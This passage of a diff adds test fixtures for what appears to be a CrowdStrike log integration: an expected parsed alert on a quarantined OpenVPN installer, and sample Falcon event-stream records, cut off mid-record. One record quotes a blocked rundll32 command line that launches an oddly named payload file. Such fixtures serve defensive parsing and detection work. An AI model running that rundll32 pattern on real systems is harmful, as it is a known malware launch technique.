"ioc_type": "hash_sha256", + "ioc_value": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "type": "module" + } + ], + "is_synthetic_quarantine_disposition": true, + "local_process_id": "17076", + "logon_domain": "ABSYS", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "name": "PrewittPupAdwareSensorDetect-Lowest", + "objective": "FalconDetectionMethod", + "parent_details": { + "cmdline": "C:\\WINDOWS\\Explorer.EXE", + "filename": "explorer.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\explorer.exe", + "local_process_id": "1040", + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "process_id": "392736520876", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "timestamp": "2023-11-03T18:00:32.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + }, + "parent_process_id": "392736520876", + "pattern_disposition": 2176, + "pattern_disposition_description": "Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.", + "pattern_disposition_details": { + "blocking_unsupported_or_disabled": false, + "bootup_safeguard_enabled": false, + "critical_process_disabled": false, + "detect": false, + "fs_operation_blocked": false, + "handle_operation_downgraded": false, + "inddet_mask": false, + "indicator": false, + "kill_action_failed": false, + "kill_parent": false, + "kill_process": false, + "kill_subprocess": false, + "operation_blocked": false, + "policy_disabled": false, + "process_blocked": true, + "quarantine_file": true, + "quarantine_machine": false, + "registry_operation_blocked": false, + "rooting": false, + "sensor_only": false, + 
"suspend_parent": false, + "suspend_process": false + }, + "pattern_id": "5761", + "platform": "Windows", + "poly_id": "AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==", + "process_end_time": "2023-11-03T18:00:21.000Z", + "process_id": "399748687993", + "process_start_time": "2023-11-03T18:00:13.000Z", + "product": "epp", + "quarantined_files": [ + { + "filename": "\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "state": "quarantined" + } + ], + "scenario": "NGAV", + "severity": 30, + "sha1": "0000000000000000000000000000000000000000", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "show_in_ui": true, + "source_products": [ + "FalconInsight" + ], + "source_vendors": [ + "CrowdStrike" + ], + "status": "new", + "tactic": "MachineLearning", + "tactic_id": "CSTA0004", + "technique": "Adware/PUP", + "technique_id": "CST0000", + "timestamp": "2023-11-03T18:00:22.328Z", + "tree_id": "1931778", + "tree_root": "38687993", + "triggering_process_graph_id": "pid:2ce4124ad4adc8c1c54dbfec4b:399748687993", + "type": "ldt", + "updated_timestamp": "2023-11-03T19:00:23.985Z", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + } + }, + "data_stream": { + "dataset": "crowdstrike.alert", + "namespace": "ep", + "type": "logs" + }, + "device": { + "id": "2ce412d17b334ad4adc8c1c54dbfec4b" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "14bc069f-0d77-4637-b5c7-44a24faa08d5", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + 
"agent_id_status": "verified", + "dataset": "crowdstrike.alert", + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ingested": "2024-02-21T09:17:46Z", + "kind": "alert", + "original": "{\"agent_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"aggregate_id\":\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"alleged_filetype\":\"exe\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"cloud_indicator\":\"false\",\"cmdline\":\"\\\"C:\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\\\"\",\"composite_id\":\"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"confidence\":10,\"context_timestamp\":\"2023-11-03T18:00:31Z\",\"control_graph_id\":\"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778\",\"crawl_edge_ids\":{\"Sensor\":[\"KZcZ=__;K\\u0026cmqQ]Z=W,QK4W.9(rBfs\\\\gfmjTblqI^F-_oNnAWQ\\u0026-o0:dR/\\u003e\\u003e2J\\u003cd2T/ji6R\\u0026RIHe-tZSkP*q?HW;:leq.:kk)\\u003eIVMD36[+=kiQDRm.bB?;d\\\"V0JaQlaltC59Iq6nM?6`\\u003eZAs+LbOJ9p9A;9'WV9^H3XEMs8N\",\"KZcZA__;?\\\"cmott@m_k)MSZ^+C?.cg\\u003cLga#0@71X07*LY2teE56*16pL[=!bjF7g@0jOQE'jT6RX_F@sr#RP-U/d[#nm9A,A,W%cl/T@\\u003cW`alY1K_h%QDBBF;_e7S!!*'!\",\"KZd)iK2;s\\\\ckQl_P*d=Mo?^a7/JKc\\\\*L48169!7I5;0\\\\\\u003cH^hNG\\\"ZQ3#U3\\\"eo\\u003c\\u003e92t[f!\\u003e*b9WLY@H!V0N,BJsNSTD:?/+fY';e\\u003cOHh9AmlT?5\\u003cgGqK:*L99kat+P)eZ$HR\\\"Ql@Q!!!$!rr\",\"N6=Ks_B9Bncmur)?\\\\[fV$k/N5;:6@aB$P;R$2XAaPJ?E\\u003cG5,UfaP')8#2AY4ff+q?T?b0/RBi-YAeGmb\\u003c6Bqp[DZh#I(jObGkjJJaMf\\\\:#mb;BM\\\\L[g!\\\\F*M!!*'!\",\"N6B%O`'=_7d#%u\\u0026d[+LTNDs\\u003c3307?8n=GrFI:4YYGCL,cIt-Tuj!\\u0026\\u003c6:3RbC`uNjL#gW\\u0026=)E`4^/'fp*.bFX@p_$,R6.\\\"=lV*T*5Vf`c.:nkd$+YD:DJ,Ls0[sArC')K%YTc$:@kUQW5s8N\",\"N6B%s!\\\\k)ed$F6\\u003ea%iM\\\"\\u003cFTSe/eH8M:\\u003c9gf;$$.
b??kpC*99aX!Lq:g6:Q3@Ga4Zrb@MaMa]L'YAt$IFBu])\\\"H^sF$r7gDPf6\\u0026CHpVKO3\\u003cDgK9,Y/e@V\\\"b\\u0026m!\\u003c\\u003c'\",\"N6CU\\u0026`%VT\\\"d$=67=h\\\\I)/BJH:8-lS!.%\\\\-!$1@bAhtVO?q4]9'9'haE4N0*-0Uh'-'f',YW3]T=jL3D#N=fJi]Pp-bWej+R9q[%h[p]p26NK8q3b50k9G:.\\u0026eM\\u003cQer\\u003e__\\\"59K'R?_=`'`rK/'hA\\\"r+L5i-*Ut5PI!!*'!\",\"N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A\\u0026FE;(naXB4h/OG\\\"%MDAR=fo41Z]rXc\\\"J-\\\\\\u0026\\u0026V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr\",\"N6CUF__;K!d$:\\\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\\\"X'\\\\AtNML2_C__7ic6,8Dc[F\\u003c0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##\\u0026$^81(P+hN*-#rf/cUs)Wb\\\"\\u003c_/?I'[##WMh'H[Rcl+!!\\u003c\\u003c'\",\"N6L[G__;K!d\\\"qhT7k?[D\\\"Bk:5s%+=\\u003e#DM0j$_\\u003cr/JG0TCEQ!Ug(be3)\\u0026R2JnX+RSqorgC-NCjf6XATBWX(5\\u003cL1J1DV\\u003e44ZjO9q*d!YLuHhkq!3\\u003e3tpi\\u003eOPYZp9]5f1#/AlRZL06`/I6cl\\\"d.\\u0026=To@9kS!prs8N\"]},\"crawl_vertex_ids\":{\"Sensor\":[\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993\",\"quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\"]},\"crawled_timestamp\":\"2023-11-03T19:00:23.985020992Z\",\"created_timestamp\":\"2023-11-03T18:01:23.995794943Z\",\"data_domains\":[\"Endpoint\"],\"descr
iption\":\"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.\",\"device\":{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-10-12T03:45:57.753Z\",\"agent_version\":\"7.04.17605.0\",\"bios_manufacturer\":\"ABC\",\"bios_version\":\"F8CN42WW(V2.05)\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"config_id_base\":\"65994763\",\"config_id_build\":\"17605\",\"config_id_platform\":\"3\",\"device_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"external_ip\":\"81.2.69.142\",\"first_seen\":\"2023-04-07T09:36:36Z\",\"groups\":[\"18704e21288243b58e4c76266d38caaf\"],\"hostinfo\":{\"active_directory_dn_display\":[\"WinComputers\",\"WinComputers\\\\ABC\"],\"domain\":\"ABC.LOCAL\"},\"hostname\":\"ABC709-1175\",\"last_seen\":\"2023-11-03T17:51:42Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"ab-21-48-61-05-b2\",\"machine_domain\":\"ABC.LOCAL\",\"major_version\":\"10\",\"minor_version\":\"0\",\"modified_timestamp\":\"2023-11-03T17:53:43Z\",\"os_version\":\"Windows11\",\"ou\":[\"ABC\",\"WinComputers\"],\"platform_id\":\"0\",\"platform_name\":\"Windows\",\"pod_labels\":null,\"product_type\":\"1\",\"product_type_desc\":\"Workstation\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"LENOVO\",\"system_product_name\":\"20VE\"},\"falcon_host_link\":\"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"filename\":\"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"grandparent_details\":{\"cmdline\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"filename\":\"userinit.exe\",\"filepath\":\"\\\\Device\\\\Har
ddiskVolume3\\\\Windows\\\\System32\\\\userinit.exe\",\"local_process_id\":\"4328\",\"md5\":\"b07f77fd3f9828b2c9d61f8a36609741\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135\",\"process_id\":\"392734873135\",\"sha256\":\"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"timestamp\":\"2023-10-30T16:49:19Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"yuvraj.mahajan\"},\"has_script_or_module_ioc\":\"true\",\"id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"indicator_id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"ioc_context\":[{\"ioc_description\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"ioc_source\":\"library_load\",\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"type\":\"module\"}],\"ioc_values\":[],\"is_synthetic_quarantine_disposition\":true,\"local_process_id\":\"17076\",\"logon_domain\":\"ABSYS\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"name\":\"PrewittPupAdwareSensorDetect-Lowest\",\"objective\":\"FalconDetectionMethod\",\"parent_details\":{\"cmdline\":\"C:\\\\WINDOWS\\\\Explorer.EXE\",\"filename\":\"explorer.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\explorer.exe\",\"local_process_id\":\"1040\",\"md5\":\"8cc3fcdd7d52d2d5221303c213e044ae\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"process_id\":\"392736520876\",\"sha2
56\":\"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"timestamp\":\"2023-11-03T18:00:32Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"},\"parent_process_id\":\"392736520876\",\"pattern_disposition\":2176,\"pattern_disposition_description\":\"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.\",\"pattern_disposition_details\":{\"blocking_unsupported_or_disabled\":false,\"bootup_safeguard_enabled\":false,\"critical_process_disabled\":false,\"detect\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"inddet_mask\":false,\"indicator\":false,\"kill_action_failed\":false,\"kill_parent\":false,\"kill_process\":false,\"kill_subprocess\":false,\"operation_blocked\":false,\"policy_disabled\":false,\"process_blocked\":true,\"quarantine_file\":true,\"quarantine_machine\":false,\"registry_operation_blocked\":false,\"rooting\":false,\"sensor_only\":false,\"suspend_parent\":false,\"suspend_process\":false},\"pattern_id\":5761,\"platform\":\"Windows\",\"poly_id\":\"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==\",\"process_end_time\":\"1699034421\",\"process_id\":\"399748687993\",\"process_start_time\":\"1699034413\",\"product\":\"epp\",\"quarantined_files\":[{\"filename\":\"\\\\Device\\\\Volume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"id\":\"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"state\":\"quarantined\"}],\"scenario\":\"NGAV\",\"severity\":30,\"
sha1\":\"0000000000000000000000000000000000000000\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"show_in_ui\":true,\"source_products\":[\"FalconInsight\"],\"source_vendors\":[\"CrowdStrike\"],\"status\":\"new\",\"tactic\":\"MachineLearning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Adware/PUP\",\"technique_id\":\"CST0000\",\"timestamp\":\"2023-11-03T18:00:22.328Z\",\"tree_id\":\"1931778\",\"tree_root\":\"38687993\",\"triggering_process_graph_id\":\"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993\",\"type\":\"ldt\",\"updated_timestamp\":\"2023-11-03T19:00:23.985007341Z\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"}", + "severity": 30 + }, + "file": { + "name": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "path": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe" + }, + "host": { + "domain": "ABC.LOCAL", + "hostname": "ABC709-1175", + "ip": [ + "81.2.69.142" + ], + "mac": [ + "AB-21-48-61-05-B2" + ], + "os": { + "full": "Windows11", + "platform": "Windows" + } + }, + "input": { + "type": "cel" + }, + "message": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "process": { + "end": "2023-11-03T18:00:21.000Z", + "parent": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "hash": { + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4" + }, + "pid": 392736520876 + }, + "pid": 399748687993, + "start": "2023-11-03T18:00:13.000Z", + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } + }, + "related": { + "hash": [ + "ABC709-1175", + "b07f77fd3f9828b2c9d61f8a36609741", + 
"cdf9cfebb400ce89d5b6032bfcdc693b", + "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "8cc3fcdd7d52d2d5221303c213e044ae", + "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "0000000000000000000000000000000000000000" + ], + "hosts": [ + "ABC.LOCAL" + ], + "ip": [ + "81.2.69.142" + ], + "user": [ + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "S-1-5-21-1909377054-3469629671-4104191496-4425", + "yuvraj.mahajan", + "mohit.jha" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "crowdstrike-alert" + ], + "threat": { + "tactic": { + "id": [ + "TA0004" + ], + "name": [ + "MachineLearning" + ] + }, + "technique": { + "id": [ + "T0000" + ], + "name": [ + "Adware/PUP" + ] + } + }, + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } +} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log new file mode 100644 index 00000000000..488a5ee18b2 --- /dev/null +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log 
@@ -0,0 +1,9 @@
+{"metadata":{"customerIDString":"abcabcabc22222","offset":8693900,"eventType":"FirewallMatchEvent","eventCreationTime":1698921571000,"version":"1.0"},"event":{"DeviceId":"6734ff444f4456","CustomerId":"abcabcabc22222","Ipv":"ipv4","CommandLine":"System","ConnectionDirection":"1","EventType":"FirewallRuleIP4Matched","Flags":{"Audit":false,"Log":true,"Monitor":true},"HostName":"INPUNEDITCLP229","ICMPCode":"","ICMPType":"","ImageFileName":"System","LocalAddress":"81.2.69.142","LocalPort":"445","MatchCount":1,"MatchCountSinceLastReport":1,"NetworkProfile":"2","PID":"11111111","PolicyName":"PROD-FW-Workstations-Office-20201001","PolicyID":"3ec266b28bef471f9fd990e4f39ac829","Protocol":"6","RemoteAddress":"81.2.69.142","RemotePort":"53452","RuleAction":"2","RuleDescription":"","RuleFamilyID":"11111111aaaaaaaa","RuleGroupName":"SMBRules","RuleName":"InboundSMBBlock\u0026LogPrivate","RuleId":"4877172638743447345","Status":"","Timestamp":"2023-11-02T10:39:29Z","TreeID":"","Platform":"windows"}}
+{"metadata":{"customerIDString":"abcabcabc22222","offset":8693906,"eventType":"IdpDetectionSummaryEvent","eventCreationTime":1698921607000,"version":"1.0"},"event":{"ContextTimeStamp":133433951380000000,"DetectId":"abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222","DetectName":"Unusual login to an endpoint","DetectDescription":"A user logged into a machine for the first time","FalconHostLink":"https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222?_cid=abcabcabc22222","StartTime":133433949600000000,"EndTime":133433949600000000,"Severity":34,"SeverityName":"Low","Tactic":"InitialAccess","Technique":"ValidAccounts","Objective":"Gain Access","SourceAccountDomain":"NA.AAA.ABC.com","SourceAccountName":"abc.service","SourceAccountUpn":"admin.service@example.com","SourceAccountObjectSid":"S-1-S-1-S-1-1111-1844237615-1801674531-175881","SourceEndpointAccountObjectGuid":"C078A5DA-E13B-4418-AA28-802EF8C16210","SourceEndpointAccountObjectSid":"S-1-S-1-S-1-1111-1844237615-1801674531-316681","SourceEndpointHostName":"nope122.na.net.ABC.com","SourceEndpointIpAddress":"81.2.69.142","SourceEndpointSensorId":"a2f1de586958434eb5e14e30214e17ed","ActivityId":"76CC8396-7148-4CEB-84CB-08FAFE4FAC37","PatternId":51135,"SourceVendors":"CrowdStrike","SourceProducts":"FalconIdentityProtection","DataDomains":"Identity"}}
+{"metadata":{"customerIDString":"abcabcabc22222","offset":8694126,"eventType":"IdentityProtectionEvent","eventCreationTime":1698923523065,"version":"1.0"},"event":{"IncidentType":"Unusuallogintoanendpoint","IncidentDescription":"Unusuallogintoanendpoint","Severity":4,"SeverityName":"LOW","StartTime":1698923340000,"EndTime":1698923340000,"IdentityProtectionIncidentId":"7a79b2de-4e10-41fb-818f-2bdf53c1625a","UserName":"NA.NET.ABC.com\\abc.service","EndpointName":"itreg1d3wp8vh3.eu.net.ABC.com","EndpointIp":"","Category":"Detections","NumbersOfAlerts":1,"NumberOfCompromisedEntities":2,"State":"NEW","FalconHostLink":"https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:7A79B2DE-4E10-41FB-818F-2BDF53C1625A"}}
+{"metadata":{"customerIDString":"abcabcabc22222","offset":8694676,"eventType":"AuthActivityAuditEvent","eventCreationTime":1698927699286,"version":"1.0"},"event":{"UserId":"admin.rose@example.com","UserIp":"81.2.69.144","OperationName":"saml2Assert","ServiceName":"CrowdstrikeAuthentication","Success":true,"UTCTimestamp":1698927699,"AuditKeyValues":[{"Key":"target_user","ValueString":"admin.rose@example.com"},{"Key":"trace_id","ValueString":"19169200-76c5-4861-92f1-355d0a908f40"},{"Key":"saml_envelope","ValueString":"SampleValue"},{"Key":"saml_assertion","ValueString":"sampleassertion"},{"Key":"app_id","ValueString":"fa8e047e-2e60-4837-b987-c57020947cd6"},{"Key":"actor_user","ValueString":"admin.rose@example.com"},{"Key":"actor_user_uuid","ValueString":"8940ddf0-bc3c-480b-a05a-bb94ff5dc0fb"},{"Key":"actor_cid","ValueString":"abcabcabc22222"}],"Attributes":{"actor_cid":"abcabcabc22222","actor_user":"admin.rose@example.com","actor_user_uuid":"00000000-aaaa-480b-a05a-bb94ff5dc0fb","app_id":"aaaaaaaa-2e60-4837-b987-c57020947cd6","saml_assertion":"saml_assertion_sample","target_user":"admin.rose@example.com","trace_id":"000000-76c5-4861-92f1-355d0a908f40"}}}
+{"metadata":{"customerIDString":"abcabcabc22222","offset":8694733,"eventType":"UserActivityAuditEvent","eventCreationTime":1698928127000,"version":"1.0"},"event":{"UserId":"admin.rose@example.com","UserIp":"81.2.69.144","OperationName":"reveal_token","ServiceName":"sensor_update_policy","AuditKeyValues":[{"Key":"device_id","ValueString":"abcancancbanjjagjaj"},{"Key":"seedID","ValueString":"101"},{"Key":"message","ValueString":"Removeduplicatesensor."}],"UTCTimestamp":1698928127,"Attributes":{"device_id":"afjafanfafasfjaf","message":"Removeduplicatesensor.","seedID":"101"}}}
+{"metadata":{"customerIDString":"abcabcabc22222","offset":8694992,"eventType":"ScheduledReportNotificationEvent","eventCreationTime":1698930172000,"version":"1.0"},"event":{"UserUUID":"9999999-bc3c-99bb-a05a-bb94ff5dc0fb","UserID":"admin.rose@example.com","ExecutionID":"efghtigh","ReportID":"999999ddddddddd","ReportName":"LarouxSearch","ReportType":"event_search","ReportFileReference":"/reports/entities/report-executions-download/v1?ids=eeeeeeeeeerrrrr444444","Status":1,"StatusMessage":"message","ExecutionMetadata":{"ExecutionStart":1698930019000,"ExecutionDuration":152176,"ReportFileName":"Laroux_Search_2023_November_2_13017_34176.csv","ResultCount":0,"ResultID":"fffffzdlIiwiY3VzdG9tZXJfYXBwIjoiZWFtIiwic2lnbmF0dXJlX3BvcnRpb24iOiIzYWRhOTZiNDA4MTkxNTFhZmIxYjFkOTM2MWZhMmE1NjBmNGNkMzc0ODQxNTY4MDlkYzhmNDRkMmRkZDY1NzdlIn0=","SearchWindowStart":1698843600000,"SearchWindowEnd":1698930000000}}}
+{"metadata":{"customerIDString":"abcabcabc22222","offset":8695284,"eventType":"RemoteResponseSessionStartEvent","eventCreationTime":1698932494000,"version":"1.0"},"event":{"SessionId":"1111-fffff-4bb4-99c1-74c13cfc3e5a","HostnameField":"UKCHUDL00206","UserName":"admin.rose@example.com","StartTimestamp":1698932494,"AgentIdString":"fffffffff33333"}}
+{"metadata":{"customerIDString":"abcabcabc22222","offset":8695332,"eventType":"DetectionSummaryEvent","eventCreationTime":1698932615000,"version":"1.0"},"event":{"ProcessStartTime":1698932614,"ProcessEndTime":1698932614,"ProcessId":54665651,"ParentProcessId":540396081,"ComputerName":"INNOIDL0032","UserName":"vishnu.sharma","DetectName":"AttackerMethodology","DetectDescription":"Rundll32launchedafilewithanunusualname.Somemalwareabusesrundll32tolaunchmaliciouspayloads.Investigatethecommandlinearguments,astheylikelyreferencethemaliciouspayload.","Severity":4,"SeverityName":"High","FileName":"rundll32.exe","FilePath":"\\Device\\HarddiskVolume4\\Windows\\System32","CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\"\\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh","SHA256String":"d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e","MD5String":"a52bfa4a96f97c368312028dbd7c8461","SHA1String":"0000000000000000000000000000000000000000","MachineDomain":"AP","FalconHostLink":"https://falcon.crowdstrike.com/activity/detections/detail/6902738b2a374a718cd9a45085baaf50/2246270721205?_cid=gffffffffy3zjobdz7ewb4xjqyjsy5a","SensorId":"69027ffffffffffffaaf50","IOCType":"hash_sha256","IOCValue":"d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e","DetectId":"ldt:690ddddddd0721205","LocalIP":"81.2.69.144","MACAddress":"02-50-41-00-00-01","Tactic":"DefenseEvasion","Technique":"Rundll32","Objective":"KeepAccess","PatternDispositionDescription":"Prevention,processwasblockedfromexecution.","PatternDispositionValue":2048,"PatternDispositionFlags":{"Indicator":false,"Detect":false,"InddetMask":false,"SensorOnly":false,"Rooting":false,"KillProcess":false,"KillSubProcess":false,"QuarantineMachine":false,"QuarantineFile":false,"PolicyDisabled":false,"KillParent":false,"OperationBlocked":false,"ProcessBlocked":true,"RegistryOperationBlocked":false,"CriticalProcessDisabled":false,"BootupSafeguardEnabled":false,"FsOperationBlocked":false,"HandleOperationDowngraded":false,"KillActionFailed":fals